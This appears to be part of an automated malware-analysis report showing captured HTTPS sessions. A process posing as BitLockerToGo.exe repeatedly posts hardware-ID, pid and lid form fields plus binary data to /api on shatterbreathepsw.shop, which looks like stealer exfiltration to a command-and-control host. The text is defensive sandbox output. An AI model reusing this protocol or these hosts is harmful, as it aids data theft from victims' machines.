                                                            2024-05-02 15:04:23 UTC563INData Raw: 33 64 62 34 0d 0a 73 71 62 6f 34 68 44 43 39 41 72 6c 61 6f 69 54 54 69 74 78 39 45 78 55 44 32 32 6f 7a 49 49 39 30 4b 72 72 6f 41 36 6a 43 72 6a 4a 72 4f 48 41 5a 75 44 4f 4b 74 46 47 67 70 70 73 57 42 54 57 64 6e 52 37 48 39 32 70 72 6a 66 5a 69 49 72 45 4c 4a 6b 71 33 74 50 4b 6d 34 63 38 79 50 30 6f 69 42 4b 71 71 57 35 77 65 2f 30 33 58 67 5a 6b 69 71 6e 73 48 2b 71 4b 79 64 64 72 77 57 2f 41 78 73 4f 47 6b 58 6d 74 6d 6b 71 49 44 2f 7a 79 49 30 6f 43 6e 32 49 39 59 45 2b 45 78 6f 73 30 38 73 2b 52 67 6a 53 44 4b 50 58 58 30 6f 6d 76 63 62 47 66 4b 4d 6c 67 67 5a 70 73 54 67 58 57 64 6e 51 74 4d 59 71 38 34 30 2b 78 78 35 6a 38 4c 4a 6c 78 35 4a 44 50 6e 49 64 69 6f 34 42 6a 69 67 54 37 7a 32 77 52 52 38 52 38 5a 44 39 64 31 65 36 49 4e 4b 32 67 34
                                                            Data Ascii: 3db4sqbo4hDC9ArlaoiTTitx9ExUD22ozII90KrroA6jCrjJrOHAZuDOKtFGgppsWBTWdnR7H92prjfZiIrELJkq3tPKm4c8yP0oiBKqqW5we/03XgZkiqnsH+qKyddrwW/AxsOGkXmtmkqID/zyI0oCn2I9YE+Exos08s+RgjSDKPXX0omvcbGfKMlggZpsTgXWdnQtMYq840+xx5j8LJlx5JDPnIdio4BjigT7z2wRR8R8ZD9d1e6INK2g4
                                                            2024-05-02 15:04:23 UTC1369INData Raw: 4e 4c 43 4d 71 61 59 61 59 6f 49 2b 50 6b 6e 51 68 61 45 4a 54 39 67 41 73 71 6a 36 6c 43 78 79 49 37 49 5a 73 35 69 33 74 33 4a 6a 49 42 79 34 4e 67 41 37 47 4f 71 39 6a 51 4a 53 39 52 75 46 57 67 66 7a 61 4c 32 48 59 69 49 34 61 6c 7a 6a 77 4f 59 6b 71 7a 68 6d 52 72 4c 2f 53 69 41 42 4b 71 70 62 67 6b 62 6b 79 30 31 5a 67 44 4a 70 75 74 4e 73 74 71 50 7a 32 6e 54 62 74 2f 65 7a 6f 6d 53 65 4b 36 51 61 34 34 44 34 2f 51 72 54 56 50 59 52 6c 30 47 54 38 32 32 6f 41 66 77 69 4b 6a 50 5a 38 31 69 7a 64 43 45 34 75 74 74 37 76 34 44 6e 6d 43 42 6d 6d 78 4f 48 39 5a 32 64 43 30 4c 79 36 72 68 57 37 7a 47 6a 63 35 71 7a 32 58 56 31 73 36 4b 68 33 69 6f 6e 6d 6d 4b 41 2b 58 78 4b 55 51 58 6b 43 49 33 61 45 2b 45 78 6f 73 30 38 73 2b 52 67 6a 53 44 4b 50 54 58
                                                            Data Ascii: NLCMqaYaYoI+PknQhaEJT9gAsqj6lCxyI7IZs5i3t3JjIBy4NgA7GOq9jQJS9RuFWgfzaL2HYiI4alzjwOYkqzhmRrL/SiABKqpbgkbky01ZgDJputNstqPz2nTbt/ezomSeK6Qa44D4/QrTVPYRl0GT822oAfwiKjPZ81izdCE4utt7v4DnmCBmmxOH9Z2dC0Ly6rhW7zGjc5qz2XV1s6Kh3ionmmKA+XxKUQXkCI3aE+Exos08s+RgjSDKPTX
                                                            2024-05-02 15:04:23 UTC1369INData Raw: 4f 79 6b 57 47 4f 41 75 76 2f 49 30 49 66 6b 7a 77 39 59 67 66 46 72 2b 31 53 75 63 79 4a 67 69 4b 70 41 37 47 51 77 35 4c 41 4b 75 4c 57 53 59 6f 48 2b 50 49 39 43 79 61 56 49 44 68 71 47 59 72 47 69 30 44 38 6f 4f 4c 62 42 4b 6f 44 6d 74 66 49 79 74 67 77 34 4a 64 6b 69 77 6e 6c 39 79 5a 42 45 4a 63 38 50 32 49 48 78 61 66 68 58 4c 62 4a 67 39 42 2b 77 57 54 49 33 4d 36 4d 6a 33 2b 73 31 69 62 76 59 34 47 78 4b 31 46 54 7a 6d 78 32 52 77 7a 65 72 65 6f 64 68 38 75 48 7a 47 76 58 4b 4c 4b 37 32 38 54 6f 47 62 6e 2b 41 2b 78 49 37 66 31 73 45 56 48 57 49 7a 64 6c 43 64 69 68 37 56 79 38 78 6f 62 48 59 38 6c 6f 32 74 33 42 6a 6f 74 35 6f 35 74 73 6c 51 4c 71 2b 53 6c 49 47 5a 78 75 65 41 56 6b 6f 65 37 6e 52 2f 4b 51 79 34 4a 64 31 6d 4f 59 35 63 65 45 6a
                                                            Data Ascii: OykWGOAuv/I0Ifkzw9YgfFr+1SucyJgiKpA7GQw5LAKuLWSYoH+PI9CyaVIDhqGYrGi0D8oOLbBKoDmtfIytgw4Jdkiwnl9yZBEJc8P2IHxafhXLbJg9B+wWTI3M6Mj3+s1ibvY4GxK1FTzmx2Rwzereodh8uHzGvXKLK728ToGbn+A+xI7f1sEVHWIzdlCdih7Vy8xobHY8lo2t3Bjot5o5tslQLq+SlIGZxueAVkoe7nR/KQy4Jd1mOY5ceEj
                                                            2024-05-02 15:04:23 UTC1369INData Raw: 74 69 67 2f 68 38 6a 35 62 45 4a 49 67 4f 69 31 42 6f 73 57 4c 48 37 58 51 79 5a 6f 75 67 55 33 4e 30 39 53 4d 67 7a 4c 49 2f 58 66 4a 59 49 48 6f 52 43 4a 34 31 69 6b 36 4c 56 65 49 37 75 42 52 76 73 4f 4f 79 57 66 46 62 4e 72 64 7a 34 53 4f 65 36 79 65 5a 49 41 61 35 2f 51 6b 51 78 71 54 49 6a 74 75 48 63 6d 76 6f 42 48 61 6f 2b 4b 43 61 39 6b 6f 67 70 4b 45 72 62 4e 46 67 39 59 41 37 42 65 6b 6d 55 64 51 65 2f 31 46 64 6d 6f 44 69 76 61 69 48 37 50 41 6a 73 78 6f 30 32 62 49 33 73 4f 4b 68 6e 71 6f 6b 57 53 4a 42 76 6a 35 4c 55 6b 64 6d 53 59 2f 61 51 37 4f 71 75 78 59 38 6f 62 68 71 51 65 42 62 38 4b 51 6e 4d 6a 41 57 71 4f 4d 63 73 55 6d 34 66 45 72 57 51 57 4e 62 6c 34 47 45 49 54 47 69 30 62 61 6f 2b 4b 43 61 38 30 6f 67 70 4b 45 6a 6f 74 34 71 5a
                                                            Data Ascii: tig/h8j5bEJIgOi1BosWLH7XQyZougU3N09SMgzLI/XfJYIHoRCJ41ik6LVeI7uBRvsOOyWfFbNrdz4SOe6yeZIAa5/QkQxqTIjtuHcmvoBHao+KCa9kogpKErbNFg9YA7BekmUdQe/1FdmoDivaiH7PAjsxo02bI3sOKhnqokWSJBvj5LUkdmSY/aQ7OquxY8obhqQeBb8KQnMjAWqOMcsUm4fErWQWNbl4GEITGi0bao+KCa80ogpKEjot4qZ
                                                            2024-05-02 15:04:23 UTC1369INData Raw: 34 50 67 76 52 52 57 58 49 44 5a 6a 44 34 72 67 69 44 54 5a 69 49 37 61 4c 4a 6b 71 6d 76 44 50 6e 4a 56 78 73 4a 42 76 69 30 69 43 6d 6a 4d 48 65 2f 30 33 58 67 5a 6b 69 71 6e 73 48 2b 71 4b 79 63 78 2b 78 57 6e 61 32 4d 32 47 69 33 71 79 6b 57 2b 4d 42 75 54 36 4b 45 55 61 6e 53 63 7a 59 51 37 42 70 2b 56 62 75 4d 36 45 67 69 4b 70 41 37 47 51 77 35 4c 41 4b 75 4c 57 52 49 51 48 34 62 46 45 49 67 7a 59 52 6c 31 30 5a 36 48 46 6f 46 69 2b 69 4e 47 41 4c 4d 5a 67 30 74 37 48 6a 49 74 2b 72 4a 64 68 67 51 33 69 39 69 4e 4f 47 70 45 75 4d 48 38 49 78 36 66 67 56 4c 76 43 6a 63 4e 6e 67 53 61 79 75 36 2f 4b 68 32 72 67 7a 69 72 48 4f 75 33 6e 50 45 70 54 2f 6b 55 70 49 32 53 69 78 66 6b 33 32 61 50 4a 78 57 43 42 4d 4a 69 51 79 5a 69 42 64 37 4b 53 5a 34 77
                                                            Data Ascii: 4PgvRRWXIDZjD4rgiDTZiI7aLJkqmvDPnJVxsJBvi0iCmjMHe/03XgZkiqnsH+qKycx+xWna2M2Gi3qykW+MBuT6KEUanSczYQ7Bp+VbuM6EgiKpA7GQw5LAKuLWRIQH4bFEIgzYRl10Z6HFoFi+iNGALMZg0t7HjIt+rJdhgQ3i9iNOGpEuMH8Ix6fgVLvCjcNngSayu6/Kh2rgzirHOu3nPEpT/kUpI2Sixfk32aPJxWCBMJiQyZiBd7KSZ4w
                                                            2024-05-02 15:04:23 UTC1369INData Raw: 30 6f 63 6c 53 30 33 5a 78 33 59 6f 75 6c 58 74 38 53 43 7a 47 72 54 62 74 58 5a 78 34 6d 4a 64 61 69 61 59 6f 51 50 71 72 39 45 49 6e 6a 57 4b 53 34 74 56 34 6a 75 77 30 69 69 78 63 6d 71 42 39 34 6d 73 72 76 64 34 75 73 5a 34 4a 46 6b 78 31 43 6f 73 53 52 45 47 35 77 71 4d 57 41 49 7a 4b 66 79 56 72 66 47 69 63 5a 6e 7a 6d 37 65 30 38 53 59 68 6e 61 6f 6c 57 57 4b 42 75 6e 31 62 41 64 37 2f 55 56 32 61 68 65 4b 39 71 49 66 67 4d 57 48 32 57 50 47 65 64 43 51 72 4f 47 66 50 4d 6a 39 63 65 39 6a 67 62 45 72 52 56 50 4f 62 48 5a 70 41 64 69 6c 34 56 53 35 78 6f 37 4e 61 63 74 6f 31 64 54 48 68 49 74 7a 6f 35 35 6c 69 67 62 67 2b 43 56 4f 48 35 49 70 64 69 4e 6e 6f 63 57 67 57 4b 71 49 30 59 41 73 36 6b 6e 33 2f 4d 4f 51 77 42 72 4c 69 53 62 76 59 2f 4f 5a
                                                            Data Ascii: 0oclS03Zx3YoulXt8SCzGrTbtXZx4mJdaiaYoQPqr9EInjWKS4tV4juw0iixcmqB94msrvd4usZ4JFkx1CosSREG5wqMWAIzKfyVrfGicZnzm7e08SYhnaolWWKBun1bAd7/UV2aheK9qIfgMWH2WPGedCQrOGfPMj9ce9jgbErRVPObHZpAdil4VS5xo7Nacto1dTHhItzo55ligbg+CVOH5IpdiNnocWgWKqI0YAs6kn3/MOQwBrLiSbvY/OZ
                                                            2024-05-02 15:04:23 UTC1369INData Raw: 41 6a 4a 69 31 6e 6f 62 47 75 4e 39 6e 52 34 61 6b 48 67 57 2f 57 6b 4a 7a 49 77 48 53 70 6b 47 2b 42 42 76 6a 30 4b 6b 59 63 6e 79 63 79 5a 51 7a 4b 71 75 52 59 74 38 75 46 79 57 76 43 5a 39 37 5a 79 6f 4f 50 4d 75 37 2b 41 2b 78 49 37 65 6c 73 45 56 48 57 44 79 31 75 41 38 66 75 69 44 53 74 68 75 47 70 64 61 6b 44 73 5a 44 44 68 73 41 71 34 74 5a 6b 69 51 33 71 2b 79 70 4e 46 70 41 6b 4d 32 30 45 79 61 48 6b 57 62 62 48 69 63 6c 6c 77 47 37 66 32 73 2b 4d 6a 58 47 6d 6b 43 6a 4a 59 49 47 61 62 45 34 4c 31 6e 5a 30 4c 53 2f 52 6f 2b 78 59 38 71 44 69 33 53 4b 70 41 38 4f 34 72 2b 48 41 64 61 7a 57 4d 4d 56 49 34 66 30 6f 54 68 4f 62 4c 54 35 6f 43 38 43 72 34 46 65 67 77 49 6e 46 66 74 4e 6f 30 39 58 49 69 59 42 32 70 70 39 75 68 41 79 71 76 30 51 69 65
                                                            Data Ascii: AjJi1nobGuN9nR4akHgW/WkJzIwHSpkG+BBvj0KkYcnycyZQzKquRYt8uFyWvCZ97ZyoOPMu7+A+xI7elsEVHWDy1uA8fuiDSthuGpdakDsZDDhsAq4tZkiQ3q+ypNFpAkM20EyaHkWbbHicllwG7f2s+MjXGmkCjJYIGabE4L1nZ0LS/Ro+xY8qDi3SKpA8O4r+HAdazWMMVI4f0oThObLT5oC8Cr4FegwInFftNo09XIiYB2pp9uhAyqv0Qie
                                                            2024-05-02 15:04:23 UTC1369INData Raw: 74 56 34 6a 75 31 56 79 38 78 6f 37 55 66 59 78 50 31 4e 66 46 6e 4a 42 6c 72 39 59 6d 37 32 4f 42 73 53 6f 4a 53 39 52 39 65 41 56 6b 6f 65 37 6b 54 76 4b 51 79 35 49 2b 6d 6a 32 4a 68 35 54 59 36 42 6d 2f 32 41 44 73 45 59 4b 61 52 77 6b 46 31 6e 5a 30 50 30 47 69 78 59 73 66 6f 49 6a 52 67 43 79 47 61 38 6a 43 77 6f 6d 57 63 65 65 6f 56 71 41 65 34 50 59 38 54 67 53 5a 62 6e 67 46 5a 4b 48 75 37 78 2f 71 69 72 43 71 42 36 6f 44 6d 74 6e 44 6b 5a 46 6b 72 59 5a 76 78 32 43 42 6d 68 4d 48 65 2f 31 46 64 6e 56 50 6b 75 79 67 61 72 48 47 68 38 56 36 30 43 58 39 78 73 36 4e 6b 48 57 33 6d 53 6a 4a 59 49 47 61 62 45 39 54 7a 6d 78 6c 49 32 65 68 78 61 42 62 6f 34 6a 52 67 44 79 54 4d 34 2b 44 6b 39 72 53 47 73 75 4a 4a 75 39 6a 38 35 6c 48 49 6c 4f 41 62 6d
                                                            Data Ascii: tV4ju1Vy8xo7UfYxP1NfFnJBlr9Ym72OBsSoJS9R9eAVkoe7kTvKQy5I+mj2Jh5TY6Bm/2ADsEYKaRwkF1nZ0P0GixYsfoIjRgCyGa8jCwomWceeoVqAe4PY8TgSZbngFZKHu7x/qirCqB6oDmtnDkZFkrYZvx2CBmhMHe/1FdnVPkuygarHGh8V60CX9xs6NkHW3mSjJYIGabE9TzmxlI2ehxaBbo4jRgDyTM4+Dk9rSGsuJJu9j85lHIlOAbm
                                                            2024-05-02 15:04:23 UTC1369INData Raw: 37 75 4e 4e 6f 49 65 59 31 47 48 52 62 35 62 59 31 59 65 4d 4d 75 37 55 4b 4d 73 4d 34 66 30 70 54 67 50 5a 50 43 5a 6d 41 39 7a 69 35 45 33 79 68 73 75 43 66 63 70 6e 79 4e 37 44 78 5a 46 6b 72 59 5a 72 67 67 2b 6d 2b 54 31 45 48 39 5a 67 64 43 30 61 77 61 4c 6d 55 71 65 48 6d 4e 52 76 31 32 2b 57 32 4e 57 48 6a 44 4b 66 32 41 44 73 59 36 72 70 62 42 46 52 31 68 73 31 59 77 48 4e 75 50 45 53 6b 73 4f 46 77 57 44 41 62 35 71 65 72 4f 48 72 4d 71 62 57 4d 4d 56 62 70 4a 6c 48 49 6c 4f 53 50 33 59 31 54 5a 72 38 75 77 72 68 6e 39 6d 51 42 4b 70 33 6c 4c 69 76 6b 2b 67 5a 79 39 5a 2b 78 31 43 6f 6f 32 49 68 65 50 31 75 4a 43 31 58 69 4f 36 6e 58 4b 44 61 6a 38 46 36 77 69 2f 6b 37 73 57 48 6a 7a 36 75 6e 57 69 41 47 50 7a 71 59 45 45 51 6a 44 51 49 55 79 54
                                                            Data Ascii: 7uNNoIeY1GHRb5bY1YeMMu7UKMsM4f0pTgPZPCZmA9zi5E3yhsuCfcpnyN7DxZFkrYZrgg+m+T1EH9ZgdC0awaLmUqeHmNRv12+W2NWHjDKf2ADsY6rpbBFR1hs1YwHNuPESksOFwWDAb5qerOHrMqbWMMVbpJlHIlOSP3Y1TZr8uwrhn9mQBKp3lLivk+gZy9Z+x1Coo2IheP1uJC1XiO6nXKDaj8F6wi/k7sWHjz6unWiAGPzqYEEQjDQIUyT


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.649720104.21.95.194437060C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-02 15:04:24 UTC288OUTPOST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 12861
                                                            Host: shatterbreathepsw.shop
                                                            2024-05-02 15:04:24 UTC12861OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 44 45 36 43 33 45 35 37 35 33 30 36 43 39 41 46 46 45 37 36 34 30 44 36 39 41 36 39 35 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 78 70 73 47 56 46 2d 2d 47 45 49 52 4f
                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8CDE6C3E575306C9AFFE7640D69A6953--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"xpsGVF--GEIRO
                                                            2024-05-02 15:04:25 UTC814INHTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 15:04:25 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=0tflvessie5al68n17to1bo77h; expires=Mon, 26-Aug-2024 08:51:04 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1ap%2F%2Byo5jeR6%2FKNkcF9XcB6ZVS%2BK3uGeWK0VGRUmfiBoQk2FcUugPdwTR9EKDwU7FPpX3Vifjyrc3W%2FYmsNkQ1V4wzAB3IypLrkb%2B2kjYMnuG%2FHS3Yo6MxevohYYyty%2F03NaKJmU63ts"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87d8e7542ae47ca2-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-02 15:04:25 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 0d 0a
                                                            Data Ascii: 11ok 191.96.150.225
                                                            2024-05-02 15:04:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.649721104.21.95.194437060C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-02 15:04:26 UTC288OUTPOST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 15107
                                                            Host: shatterbreathepsw.shop
                                                            2024-05-02 15:04:26 UTC15107OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 44 45 36 43 33 45 35 37 35 33 30 36 43 39 41 46 46 45 37 36 34 30 44 36 39 41 36 39 35 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 78 70 73 47 56 46 2d 2d 47 45 49 52 4f
                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8CDE6C3E575306C9AFFE7640D69A6953--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"xpsGVF--GEIRO
                                                            2024-05-02 15:04:27 UTC804INHTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 15:04:27 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=gvn9lij6q4edivaatnfs9qhumk; expires=Mon, 26-Aug-2024 08:51:06 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rYxvKB7yB1JF2YATr3222jTQb%2FZaECHUqIitv0f9m8ZHEexZ5OA4ONvaCOZB7naJz1yhbE9giU3tVc%2FSXjLIboZxuUw6SShOh1zYgMl6wB51%2FjiSp0AtzQiH2PIY0HpkXtw1x39TtLT3"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87d8e75d5eb95f22-SYD
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-02 15:04:27 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 0d 0a
                                                            Data Ascii: 11ok 191.96.150.225
                                                            2024-05-02 15:04:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.649722104.21.95.194437060C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-02 15:04:31 UTC288OUTPOST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 19965
                                                            Host: shatterbreathepsw.shop
                                                            2024-05-02 15:04:31 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 44 45 36 43 33 45 35 37 35 33 30 36 43 39 41 46 46 45 37 36 34 30 44 36 39 41 36 39 35 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 78 70 73 47 56 46 2d 2d 47 45 49 52 4f
                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8CDE6C3E575306C9AFFE7640D69A6953--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"xpsGVF--GEIRO
                                                            2024-05-02 15:04:31 UTC4634OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de
                                                            Data Ascii: +?2+?2+?o?Mp5p_
                                                            2024-05-02 15:04:31 UTC810INHTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 15:04:31 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=aj0p7enlnrjeq607jkomrp31lg; expires=Mon, 26-Aug-2024 08:51:10 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mp%2Bx1GX3A%2Fl3lFHxJQcRM7iD7erqm7c1KAzv24n2hlokwhnxF8k6hmQ6GUyiOS64N2OJ%2BmjMZm%2BEJIqW31iGbpItFKWZ%2BLZz4jqwRukcp9eJWrRfsTJApFUHCLRhNi%2BEEHc1LbgvODhV"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87d8e77cab7a4239-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-02 15:04:31 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 0d 0a
                                                            Data Ascii: 11ok 191.96.150.225
                                                            2024-05-02 15:04:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.649723104.21.95.194437060C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-02 15:04:32 UTC287OUTPOST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 3802
                                                            Host: shatterbreathepsw.shop
                                                            2024-05-02 15:04:32 UTC3802OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 44 45 36 43 33 45 35 37 35 33 30 36 43 39 41 46 46 45 37 36 34 30 44 36 39 41 36 39 35 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 78 70 73 47 56 46 2d 2d 47 45 49 52 4f
                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8CDE6C3E575306C9AFFE7640D69A6953--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"xpsGVF--GEIRO
